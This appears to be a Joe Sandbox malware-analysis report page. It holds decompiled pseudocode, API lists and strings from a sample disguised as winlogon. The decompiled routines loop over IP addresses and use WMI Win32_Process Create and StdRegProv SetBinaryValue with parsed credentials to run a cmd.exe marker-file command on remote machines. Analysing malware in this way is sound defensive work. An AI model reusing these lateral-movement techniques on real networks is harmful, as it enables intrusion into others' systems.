    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Control-flow Graph for function d65170 (legend: Executed / Not Executed; the rendered graph was not recoverable from the extracted page)
    C-Code - Quality: 67%
    			E00D65170(void* __ebx, short* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
    				int _v8;
    				char _v16;
    				signed int _v20;
    				char _v276;
    				char _v531;
    				char _v532;
    				char _v788;
    				char* _v792;
    				short* _v796;
    				int _v800;
    				int _v804;
    				void* _v808;
    				int _v812;
    				struct _CRITICAL_SECTION _v836;
    				int _v840;
    				int _v844;
    				int _v848;
    				void* __ebp;
    				signed int _t64;
    				signed int _t65;
    				intOrPtr* _t67;
    				intOrPtr* _t86;
    				int _t92;
    				intOrPtr* _t93;
    				char* _t94;
    				int _t95;
    				intOrPtr* _t97;
    				void* _t98;
    				char* _t99;
    				int _t100;
    				intOrPtr* _t106;
    				short* _t110;
    				signed int _t114;
    				short* _t117;
    				signed int _t121;
    				short* _t124;
    				intOrPtr* _t128;
    				short* _t131;
    				intOrPtr _t148;
    				intOrPtr _t150;
    				unsigned int _t153;
    				int _t163;
    				signed int _t164;
    				void* _t165;
    				void* _t166;
    				void* _t167;
    				void* _t168;
    
    				_t158 = __edi;
    				_push(0xffffffff);
    				_push(E00D7E31B);
    				_push( *[fs:0x0]);
    				_t166 = _t165 - 0x340;
    				_t64 =  *0xd88004; // 0x276b9783
    				_t65 = _t64 ^ _t164;
    				_v20 = _t65;
    				_push(__edi);
    				_push(_t65);
    				 *[fs:0x0] =  &_v16;
    				_t67 = _a4;
    				_t128 = _a8;
    				_v808 = _t128;
    				if(_t67 != 0 && _t128 != 0) {
    					_v792 =  *_t67;
    					if( *((intOrPtr*)(_t128 + 0x24)) == 0) {
    						goto L26;
    					} else {
    						E00D6D520(__edi,  &_v276, 0, 0x100);
    						_t153 = _v792;
    						_push(_t153 & 0x000000ff);
    						_push(_t153 >> 0x00000008 & 0x000000ff);
    						_push(_t153 >> 0x00000010 & 0x000000ff);
    						E00D619F0( &_v276, "%d.%d.%d.%d", _t153 >> 0x00000010 >> 0x00000008 & 0x000000ff);
    						E00D6D520(_t158,  &_v788, 0, 0x100);
    						_v532 = 0;
    						E00D6D520(_t158,  &_v531, 0, 0xff);
    						_t167 = _t166 + 0x3c;
    						_v848 = 0;
    						_v840 = 0;
    						_v844 = 0;
    						InitializeCriticalSection( &_v836);
    						_v8 = 0;
    						E00D67570( &_v848,  &_v788);
    						_t86 =  *_t128;
    						_t163 = 0;
    						_v804 = 0;
    						_t142 =  *((intOrPtr*)(_t86 + 4)) -  *_t86 >> 9;
    						if( *((intOrPtr*)(_t86 + 4)) -  *_t86 >> 9 == 0) {
    							L24:
    							_v844 = _v848;
    							DeleteCriticalSection( &_v836);
    							E00D68340(_t128,  &_v848, _t158);
    						} else {
    							_v800 = 0;
    							do {
    								_v796 = 0;
    								_t92 = MultiByteToWideChar(0, 8,  &_v276, 0xffffffff, 0, 0);
    								_v792 = _t92;
    								if(_t92 != 0) {
    									_push(_t92 + _t92);
    									_t124 = E00D702C9(_t142);
    									_t167 = _t167 + 4;
    									_t131 = _t124;
    									_v796 = _t131;
    									MultiByteToWideChar(0, 8,  &_v276, 0xffffffff, _t131, _v792);
    									_t128 = _v808;
    								}
    								_t93 =  *_t128;
    								if(_t163 > 0xffffff) {
    									L11:
    									_t94 = 0;
    									goto L12;
    								} else {
    									_t150 =  *_t93;
    									_t121 =  *((intOrPtr*)(_t93 + 4)) - _t150 >> 9;
    									if(_t163 >= _t121) {
    										goto L11;
    									} else {
    										if(_t121 <= _t163) {
    											L25:
    											E00D6B97B("invalid vector<T> subscript");
    											goto L26;
    										} else {
    											_t94 = _v800 + _t150;
    											L12:
    											_t130 = 0;
    											_v792 = _t94;
    											_t95 = MultiByteToWideChar(0, 8, _t94, 0xffffffff, 0, 0);
    											_v812 = _t95;
    											if(_t95 != 0) {
    												_push(_t95 + _t95);
    												_t117 = E00D702C9(_t95 + _t95);
    												_t167 = _t167 + 4;
    												_t130 = _t117;
    												MultiByteToWideChar(0, 8, _v792, 0xffffffff, _t117, _v812);
    											}
    											_t97 =  *_v808;
    											if(_t163 > 0xffffff) {
    												L18:
    												_t98 = 0;
    												goto L19;
    											} else {
    												_t148 =  *_t97;
    												_t114 =  *((intOrPtr*)(_t97 + 4)) - _t148 >> 9;
    												if(_t163 >= _t114) {
    													goto L18;
    												} else {
    													if(_t114 <= _t163) {
    														goto L25;
    													} else {
    														_t98 = _v800 + _t148;
    														goto L19;
    													}
    												}
    											}
    										}
    									}
    								}
    								goto L27;
    								L19:
    								_t158 = 0;
    								_t99 = _t98 + 0x100;
    								_v792 = _t99;
    								_t100 = MultiByteToWideChar(0, 8, _t99, 0xffffffff, 0, 0);
    								_v812 = _t100;
    								if(_t100 != 0) {
    									_push(_t100 + _t100);
    									_t110 = E00D702C9(_t100 + _t100);
    									_t167 = _t167 + 4;
    									_t158 = _t110;
    									MultiByteToWideChar(0, 8, _v792, 0xffffffff, _t158, _v812);
    								}
    								E00D645D0(_t130, _v796, _t130, _t158, _t163, _t158, L"cmd.exe /c (ping 0.0.0.0 > nul) && if exist %programdata%\\evtchk.txt (exit 5) else ( type nul > %programdata%\\evtchk.txt)",  &_v804); // executed
    								_t168 = _t167 + 0xc;
    								if(_v804 == 0) {
    									_push(_t158); // executed
    									E00D64C30(_t130, _v796, _t130, _t158, _t163); // executed
    									E00D645D0(_t130, _v796, _t130, _t158, _t163, _t158, L"del %programdata%\\evtchk.txt",  &_v804); // executed
    									_t168 = _t168 + 0x10;
    								}
    								E00D7009A(_v796);
    								E00D7009A(_t130);
    								E00D7009A(_t158);
    								_t128 = _v808;
    								_t163 = _t163 + 1;
    								_v800 = _v800 + 0x200;
    								_t167 = _t168 + 0xc;
    								_t106 =  *_t128;
    								_t142 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 9;
    							} while (_t163 <  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 9);
    							goto L24;
    						}
    					}
    				}
    				L27:
    				 *[fs:0x0] = _v16;
    				return E00D6ABE4(_v20 ^ _t164);
    			}

    APIs
    • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,276B9783), ref: 00D65266
      • Part of subcall function 00D67570: EnterCriticalSection.KERNEL32(?,?,?,00D8891F,?,00D624D5,?,00000000,00D6209E), ref: 00D6758E
      • Part of subcall function 00D67570: LeaveCriticalSection.KERNEL32(00D624D5,?,00D624D5,?,00000000,00D6209E), ref: 00D675E6
    • MultiByteToWideChar.KERNEL32(00000000,00000008,?,000000FF,00000000,00000000,?), ref: 00D652CA
    • MultiByteToWideChar.KERNEL32(00000000,00000008,?,000000FF,00000000,?), ref: 00D652FD
    • MultiByteToWideChar.KERNEL32(00000000,00000008,00000000,000000FF,00000000,00000000), ref: 00D65341
    • MultiByteToWideChar.KERNEL32(00000000,00000008,?,000000FF,00000000,?), ref: 00D6536E
    • MultiByteToWideChar.KERNEL32(00000000,00000008,-00000100,000000FF,00000000,00000000), ref: 00D653B7
      • Part of subcall function 00D645D0: CoInitializeEx.OLE32(00000000,00000000), ref: 00D64635
      • Part of subcall function 00D645D0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D6464E
      • Part of subcall function 00D645D0: CredUIParseUserNameW.CREDUI(?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D64682
      • Part of subcall function 00D645D0: LocalAlloc.KERNEL32(00000040,0000001C,?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D6468C
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D646A5
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D646AE
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D646B9
      • Part of subcall function 00D645D0: SysStringLen.OLEAUT32(00000000), ref: 00D646C4
      • Part of subcall function 00D645D0: SysStringLen.OLEAUT32(?), ref: 00D646DD
      • Part of subcall function 00D645D0: SysStringLen.OLEAUT32(00000000), ref: 00D646E6
      • Part of subcall function 00D645D0: CoCreateInstance.OLE32(00D7F4B8,00000000,00000001,00D7F3E8,?), ref: 00D64707
      • Part of subcall function 00D645D0: wsprintfW.USER32 ref: 00D6472D
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D64743
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D6474D
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D64757
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?,00000000), ref: 00D64782
      • Part of subcall function 00D645D0: CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D647AC
      • Part of subcall function 00D645D0: InterlockedDecrement.KERNEL32(00000008), ref: 00D64894
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(00000000), ref: 00D648A5
      • Part of subcall function 00D645D0: InterlockedDecrement.KERNEL32(00000008), ref: 00D648DA
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(00000000), ref: 00D648EB
      • Part of subcall function 00D645D0: CoSetProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D6492E
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(Create), ref: 00D64955
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(Win32_Process), ref: 00D64962
      • Part of subcall function 00D645D0: SysAllocString.OLEAUT32(?), ref: 00D64A06
      • Part of subcall function 00D645D0: VariantClear.OLEAUT32(?), ref: 00D64B3D
      • Part of subcall function 00D645D0: VariantClear.OLEAUT32(?), ref: 00D64B46
      • Part of subcall function 00D645D0: VariantClear.OLEAUT32(?), ref: 00D64B69
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64B7D
      • Part of subcall function 00D645D0: VariantClear.OLEAUT32(?), ref: 00D64B86
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64BB8
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64BC0
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64BE9
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64BEE
      • Part of subcall function 00D645D0: SysFreeString.OLEAUT32(?), ref: 00D64BF2
      • Part of subcall function 00D645D0: LocalFree.KERNEL32(?,?,?,00000201,?,00000151,?,?,?,?,00D7E2DA,000000FF), ref: 00D64BF5
      • Part of subcall function 00D645D0: CoUninitialize.OLE32 ref: 00D64C01
    • MultiByteToWideChar.KERNEL32(00000000,00000008,?,000000FF,00000000,?), ref: 00D653E8
      • Part of subcall function 00D64C30: CoInitializeEx.OLE32(00000000,00000000), ref: 00D64C66
      • Part of subcall function 00D64C30: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D64C86
      • Part of subcall function 00D64C30: CredUIParseUserNameW.CREDUI(?,?,00000201,?,?,?,?,?,?,?,?,?,?,?,00000151), ref: 00D64CBE
      • Part of subcall function 00D64C30: LocalAlloc.KERNEL32(00000040,0000001C,?,?,00000201,?), ref: 00D64CC8
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64CE0
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64CE7
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64CF3
      • Part of subcall function 00D64C30: SysStringLen.OLEAUT32(00000000), ref: 00D64CFE
      • Part of subcall function 00D64C30: SysStringLen.OLEAUT32(?), ref: 00D64D13
      • Part of subcall function 00D64C30: SysStringLen.OLEAUT32(00000000), ref: 00D64D1C
      • Part of subcall function 00D64C30: CoCreateInstance.OLE32(00D7F4B8,00000000,00000001,00D7F3E8,?), ref: 00D64D3B
      • Part of subcall function 00D64C30: wsprintfW.USER32 ref: 00D64D5D
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64D71
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64D7B
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(?), ref: 00D64D85
      • Part of subcall function 00D64C30: CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D64DD2
      • Part of subcall function 00D64C30: CoSetProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D64E0C
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(SetBinaryValue), ref: 00D64E17
      • Part of subcall function 00D64C30: SysAllocString.OLEAUT32(StdRegProv), ref: 00D64E22
      • Part of subcall function 00D64C30: VariantClear.OLEAUT32(?), ref: 00D64EA1
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(00000000), ref: 00D6510F
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(00000000), ref: 00D65112
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D65122
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D65128
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D6512E
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D6513D
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D65142
      • Part of subcall function 00D64C30: SysFreeString.OLEAUT32(?), ref: 00D65146
      • Part of subcall function 00D64C30: LocalFree.KERNEL32(?,?,?,00000201,?,?,?,?,?,?,?,?,?,?,?,00000151), ref: 00D65149
      • Part of subcall function 00D64C30: CoUninitialize.OLE32 ref: 00D6514F
      • Part of subcall function 00D6B97B: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D6B987
    • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,276B9783), ref: 00D6548F
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    • cmd.exe /c (ping 0.0.0.0 > nul) && if exist %programdata%\evtchk.txt (exit 5) else ( type nul > %programdata%\evtchk.txt), xrefs: 00D653FB
    • invalid vector<T> subscript, xrefs: 00D654A4
    • %d.%d.%d.%d, xrefs: 00D65206
    • del %programdata%\evtchk.txt, xrefs: 00D6542F
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 246 d660f0-d6611c 247 d66157-d6615f 246->247 248 d6611e-d66149 call d6d520 GetVersionExW 246->248 249 d66161-d6618c call d6d520 GetVersionExW 247->249 250 d6619e-d661b9 GetModuleHandleA GetProcAddress 247->250 248->247 256 d6614b-d66155 248->256 249->250 260 d6618e-d6619c 249->260 253 d661bb-d661be 250->253 254 d661c0-d661eb GetCurrentProcess IsWow64Process 250->254 257 d661ee-d66252 call d62eb0 call d6eab8 * 2 253->257 254->257 256->247 266 d66254-d66257 257->266 267 d66269-d66271 257->267 260->250 266->267 268 d66259-d6625e 266->268 269 d66288-d6628e 267->269 270 d66273-d66276 267->270 268->267 271 d66260-d66266 call d7009a 268->271 272 d66290-d66295 269->272 270->269 273 d66278-d6627d 270->273 271->267 272->272 274 d66297-d66299 272->274 273->269 275 d6627f-d66285 call d7009a 273->275 277 d662a0-d662a6 274->277 275->269 277->277 280 d662a8-d662c4 277->280 282 d662c7-d662cf 280->282 282->282 283 d662d1-d662e0 282->283 284 d662e2-d662e7 283->284 284->284 285 d662e9-d662ec 284->285 286 d662f0-d662f6 285->286 286->286 287 d662f8-d66321 call d629d0 call d62920 286->287 292 d66326-d6633c 287->292 293 d66367-d66381 call d6abe4 292->293 294 d6633e-d66341 292->294 296 d66343-d6634a 294->296 297 d6634c-d66366 call d6abe4 294->297 296->293 296->297
    C-Code - Quality: 86%
    			E00D660F0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
    				signed int _v8;
    				void* _v280;
    				struct _OSVERSIONINFOW _v284;
    				void* _v556;
    				struct _OSVERSIONINFOW _v560;
    				char _v564;
    				char _v568;
    				signed int _v572;
    				intOrPtr _v576;
    				char _v580;
    				signed int _t50;
    				intOrPtr _t58;
    				intOrPtr _t63;
    				intOrPtr _t64;
    				void _t65;
    				void _t66;
    				intOrPtr _t69;
    				short _t70;
    				void _t71;
    				void _t72;
    				int _t93;
    				void* _t96;
    				void* _t97;
    				signed int _t98;
    				intOrPtr _t99;
    				void* _t103;
    				signed int _t105;
    				void* _t110;
    				void* _t111;
    				signed int _t113;
    				intOrPtr _t120;
    				void* _t126;
    				signed int _t127;
    				intOrPtr* _t130;
    				intOrPtr* _t131;
    				intOrPtr* _t132;
    				short* _t138;
    				intOrPtr _t145;
    				void* _t146;
    				void* _t147;
    				signed int _t148;
    				void* _t149;
    				void* _t150;
    
    				_t50 =  *0xd88004; // 0x276b9783
    				_v8 = _t50 ^ _t148;
    				_t96 = GetVersionExW;
    				_t145 = __ecx;
    				_v576 = __ecx;
    				_t130 = __ecx + 0x15b8;
    				if(_t130 != 0) {
    					E00D6D520(_t130,  &_v284, 0, 0x114);
    					_t149 = _t149 + 0xc;
    					_v284.dwOSVersionInfoSize = 0x114;
    					_t93 = GetVersionExW( &_v284);
    					if(_t93 != 0) {
    						asm("sbb eax, eax");
    						 *_t130 = _t93 + 1;
    					}
    				}
    				_t131 = _t145 + 0x15bc;
    				if(_t131 != 0) {
    					E00D6D520(_t131,  &_v560, 0, 0x114);
    					_t149 = _t149 + 0xc;
    					_v560.dwOSVersionInfoSize = 0x114;
    					if(GetVersionExW( &_v560) != 0) {
    						asm("sbb eax, eax");
    						 *_t131 = 6;
    					}
    				}
    				_t132 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
    				_t163 = _t132;
    				if(_t132 != 0) {
    					_v572 = 0;
    					 *_t132(GetCurrentProcess(),  &_v572); // executed
    					__eflags = _v572;
    					_t58 =  !=  ? 0x40 : 0x20;
    				} else {
    					_t13 = _t132 + 0x20; // 0x20
    					_t58 = _t13;
    				}
    				 *((intOrPtr*)(_t145 + 0x15b4)) = _t58;
    				_v564 = 0;
    				_v568 = 0;
    				E00D62EB0(_t96,  &_v564,  &_v568, _t132, _t145, _t163); // executed
    				E00D6EAB8(_t145 + 0x12b4, _v568, 0xff);
    				_t97 = _t145 + 0x11b4;
    				E00D6EAB8(_t97, _v564, 0xff);
    				_t63 = _v564;
    				_t150 = _t149 + 0x18;
    				if(_t63 != 0 && _t63 != 0xffffffff && _t63 != 0xcccccccc) {
    					E00D7009A(_t63);
    					_t150 = _t150 + 4;
    				}
    				_t64 = _v568;
    				if(_t64 != 0 && _t64 != 0xffffffff && _t64 != 0xcccccccc) {
    					E00D7009A(_t64);
    					_t150 = _t150 + 4;
    				}
    				_t103 = _t145 + 0x13b3;
    				_t146 = _t97;
    				goto L18;
    				do {
    					L20:
    					_t66 =  *(_t103 + 1);
    					_t103 = _t103 + 1;
    				} while (_t66 != 0);
    				_t105 = _t98 >> 2;
    				memcpy(_t103, _t146, _t105 << 2);
    				_t99 = _v576;
    				memcpy(_t146 + _t105 + _t105, _t146, _t98 & 0x00000003);
    				_t110 = _t99 + 0x13b4;
    				_t138 = _t110 - 1;
    				do {
    					_t69 =  *((intOrPtr*)(_t138 + 1));
    					_t138 = _t138 + 1;
    				} while (_t69 != 0);
    				_t70 = "\\"; // 0x5c
    				_t126 = _t99 + 0x12b4;
    				 *_t138 = _t70;
    				_t147 = _t126;
    				do {
    					_t71 =  *_t126;
    					_t126 = _t126 + 1;
    				} while (_t71 != 0);
    				_t127 = _t126 - _t147;
    				_t111 = _t110 - 1;
    				do {
    					_t72 =  *(_t111 + 1);
    					_t111 = _t111 + 1;
    					_t177 = _t72;
    				} while (_t72 != 0);
    				_t113 = _t127 >> 2;
    				memcpy(_t111, _t147, _t113 << 2);
    				memcpy(_t147 + _t113 + _t113, _t147, _t127 & 0x00000003);
    				E00D629D0(_t99 + 0x15c0, _t177); // executed
    				E00D62920(_t99, GetCurrentProcess(),  &_v580, _t177); // executed
    				_t120 = _v580;
    				 *(_t99 + 0x15c8) = 0 | _t120 == 0x00000002;
    				if(_t120 == 0 || _t120 == 1 &&  *((intOrPtr*)(_t99 + 0x15c0)) != 0) {
    					 *((intOrPtr*)(_t99 + 0x15c4)) = 1;
    					__eflags = _v8 ^ _t148;
    					return E00D6ABE4(_v8 ^ _t148);
    				} else {
    					 *((intOrPtr*)(_t99 + 0x15c4)) = 0;
    					return E00D6ABE4(_v8 ^ _t148);
    				}
    				L18:
    				_t65 =  *_t97;
    				_t97 = _t97 + 1;
    				if(_t65 != 0) {
    					goto L18;
    				} else {
    					_t98 = _t97 - _t146;
    					goto L20;
    				}
    			}

    APIs
    • GetVersionExW.KERNEL32(00000114), ref: 00D66145
    • GetVersionExW.KERNEL32(00000114), ref: 00D66188
    • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00D661A8
    • GetProcAddress.KERNEL32(00000000), ref: 00D661AF
    • GetCurrentProcess.KERNEL32(?), ref: 00D661D1
    • IsWow64Process.KERNELBASE(00000000), ref: 00D661D8
      • Part of subcall function 00D62EB0: GetCurrentProcess.KERNEL32 ref: 00D62EF9
      • Part of subcall function 00D62EB0: OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62F26
    • __Stoull.NTSTC_LIBCMT ref: 00D6622B
    • __Stoull.NTSTC_LIBCMT ref: 00D66242
      • Part of subcall function 00D629D0: GetCurrentProcess.KERNEL32 ref: 00D629F4
      • Part of subcall function 00D629D0: OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62A1B
      • Part of subcall function 00D62920: OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62967
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 327 d78b46-d78b76 call d788a9 330 d78b78-d78b83 call d7210f 327->330 331 d78b91-d78b9d call d76d1b 327->331 336 d78b85-d78b8c call d72122 330->336 337 d78bb6-d78bff call d78814 331->337 338 d78b9f-d78bb4 call d7210f call d72122 331->338 345 d78e68-d78e6e 336->345 346 d78c01-d78c0a 337->346 347 d78c6c-d78c75 GetFileType 337->347 338->336 349 d78c41-d78c67 GetLastError call d720ec 346->349 350 d78c0c-d78c10 346->350 352 d78c77-d78ca8 GetLastError call d720ec CloseHandle 347->352 353 d78cbe-d78cc1 347->353 349->336 350->349 354 d78c12-d78c3f call d78814 350->354 352->336 366 d78cae-d78cb9 call d72122 352->366 355 d78cca-d78cd0 353->355 356 d78cc3-d78cc8 353->356 354->347 354->349 359 d78cd4-d78d22 call d76c64 355->359 360 d78cd2 355->360 356->359 370 d78d32-d78d56 call d785c7 359->370 371 d78d24-d78d30 call d78a25 359->371 360->359 366->336 376 d78d69-d78dac 370->376 377 d78d58 370->377 371->370 378 d78d5a-d78d64 call d7294f 371->378 380 d78dcd-d78ddb 376->380 381 d78dae-d78db2 376->381 377->378 378->345 384 d78e66 380->384 385 d78de1-d78de5 380->385 381->380 383 d78db4-d78dc8 381->383 383->380 384->345 385->384 386 d78de7-d78e1a CloseHandle call d78814 385->386 389 d78e1c-d78e48 GetLastError call d720ec call d76e2d 386->389 390 d78e4e-d78e62 386->390 389->390 390->384
    C-Code - Quality: 42%
    			E00D78B46(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
    				signed int _v5;
    				char _v6;
    				void* _v12;
    				signed int _v16;
    				signed int _v20;
    				char _v24;
    				intOrPtr _v36;
    				signed int _v44;
    				void _v48;
    				char _v72;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t114;
    				void* _t122;
    				signed int _t123;
    				signed char _t124;
    				signed int _t134;
    				intOrPtr _t164;
    				intOrPtr _t180;
    				void* _t190;
    				signed int* _t191;
    				signed int _t193;
    				char _t198;
    				signed int _t204;
    				signed int _t207;
    				signed int _t216;
    				signed int _t218;
    				signed int _t220;
    				signed int _t226;
    				signed int _t228;
    				signed int _t235;
    				signed int _t236;
    				signed int _t238;
    				signed int _t240;
    				signed char _t243;
    				intOrPtr _t246;
    				void* _t249;
    				void* _t253;
    				void* _t263;
    				signed int _t264;
    				signed int _t267;
    				signed int _t270;
    				signed int _t271;
    				void* _t273;
    				void* _t275;
    				void* _t276;
    				void* _t278;
    				void* _t279;
    				void* _t281;
    				void* _t285;
    
    				_t263 = E00D788A9(__ecx,  &_v72, _a16, _a20, _a24);
    				_t193 = 6;
    				memcpy( &_v48, _t263, _t193 << 2);
    				_t275 = _t273 + 0x1c;
    				_t249 = _t263 + _t193 + _t193;
    				_t264 = _t263 | 0xffffffff;
    				if(_v36 != _t264) {
    					_t114 = E00D76D1B(_t190, _t249, _t264, __eflags);
    					_t191 = _a8;
    					 *_t191 = _t114;
    					__eflags = _t114 - _t264;
    					if(_t114 != _t264) {
    						_v20 = _v20 & 0x00000000;
    						_v24 = 0xc;
    						_t276 = _t275 - 0x18;
    						 *_a4 = 1;
    						_push(6);
    						_v16 =  !(_a16 >> 7) & 1;
    						_push( &_v24);
    						_push(_a12);
    						memcpy(_t276,  &_v48, 1 << 2);
    						_t198 = 0;
    						_t122 = E00D78814(); // executed
    						_t253 = _t122;
    						_t278 = _t276 + 0x2c;
    						_v12 = _t253;
    						__eflags = _t253 - 0xffffffff;
    						if(_t253 != 0xffffffff) {
    							L11:
    							_t123 = GetFileType(_t253); // executed
    							__eflags = _t123;
    							if(_t123 != 0) {
    								__eflags = _t123 - 2;
    								if(_t123 != 2) {
    									__eflags = _t123 - 3;
    									_t124 = _v48;
    									if(_t123 == 3) {
    										_t124 = _t124 | 0x00000008;
    										__eflags = _t124;
    									}
    								} else {
    									_t124 = _v48 | 0x00000040;
    								}
    								_v5 = _t124;
    								E00D76C64(_t198,  *_t191, _t253);
    								_t243 = _v5 | 0x00000001;
    								_v5 = _t243;
    								_v48 = _t243;
    								 *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) = _t243;
    								_t204 =  *_t191;
    								_t206 = (_t204 & 0x0000003f) * 0x30;
    								__eflags = _a16 & 0x00000002;
    								 *((char*)( *((intOrPtr*)(0xd91260 + (_t204 >> 6) * 4)) + 0x29 + (_t204 & 0x0000003f) * 0x30)) = 0;
    								if((_a16 & 0x00000002) == 0) {
    									L20:
    									_v6 = 0;
    									_push( &_v6);
    									_push(_a16);
    									_t279 = _t278 - 0x18;
    									_t207 = 6;
    									_push( *_t191);
    									memcpy(_t279,  &_v48, _t207 << 2);
    									_t134 = E00D785C7(_t191,  &_v48 + _t207 + _t207,  &_v48);
    									_t281 = _t279 + 0x30;
    									__eflags = _t134;
    									if(__eflags == 0) {
    										 *((char*)( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x29 + ( *_t191 & 0x0000003f) * 0x30)) = _v6;
    										 *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x2d + ( *_t191 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x2d + ( *_t191 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x2d + ( *_t191 & 0x0000003f) * 0x30)) & 0x00000001;
    										__eflags = _v5 & 0x00000048;
    										if((_v5 & 0x00000048) == 0) {
    											__eflags = _a16 & 0x00000008;
    											if((_a16 & 0x00000008) != 0) {
    												_t226 =  *_t191;
    												_t228 = (_t226 & 0x0000003f) * 0x30;
    												_t164 =  *((intOrPtr*)(0xd91260 + (_t226 >> 6) * 4));
